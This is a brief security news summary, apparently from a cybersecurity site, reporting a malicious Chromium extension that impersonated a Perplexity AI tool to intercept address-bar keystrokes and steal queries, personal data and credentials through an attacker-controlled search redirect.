cybersecurity.pk • 2h
Malicious Chromium Extension Spoofing Perplexity AI for Real-Time Data Exfiltration
A malicious Chromium extension masquerading as a Perplexity AI tool leveraged Manifest V3 (MV3) APIs to intercept and log real-time address bar keystrokes before user submission. By implementing a redirection pattern (User $\rightarrow$ Attacker Intermediary $\rightarrow$ Legitimate Search Provider), the threat actor captured sensitive queries, PII, and credentials without disrupting the user experience. This human-layer attack highlights a critical governance gap in browser extension auditing, allowing for silent reconnaissance and intellectual property theft within corporate environments via attacker-controlled intermediary infrastructure.